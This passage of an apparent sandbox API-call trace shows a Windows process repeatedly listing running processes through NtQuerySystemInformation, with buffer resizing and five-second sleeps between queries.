returned 0x0 [0266.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.491] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.492] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.493] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.494] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.494] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.495] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.495] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.501] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.504] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.505] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.511] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.513] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.520] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.522] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.522] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.523] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.523] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.528] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.529] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.531] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.532] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.532] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.537] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.538] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.541] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.547] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.549] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.550] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.550] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.555] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.564] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.565] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.569] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.570] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.570] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.581] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.582] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.590] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.592] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.593] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.593] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.601] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.602] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.603] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.604] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.627] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.629] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.629] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.630] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.636] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.637] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.640] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.640] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.646] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.646] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.650] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.650] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.650] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.656] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.657] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.658] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.660] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.660] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.660] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.666] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.667] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.671] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.676] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.677] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.678] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.678] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.679] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.679] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.680] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.684] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.685] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.688] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.689] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.699] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.699] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0266.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0266.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0266.703] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0266.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0266.708] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0266.709] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0266.710] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, 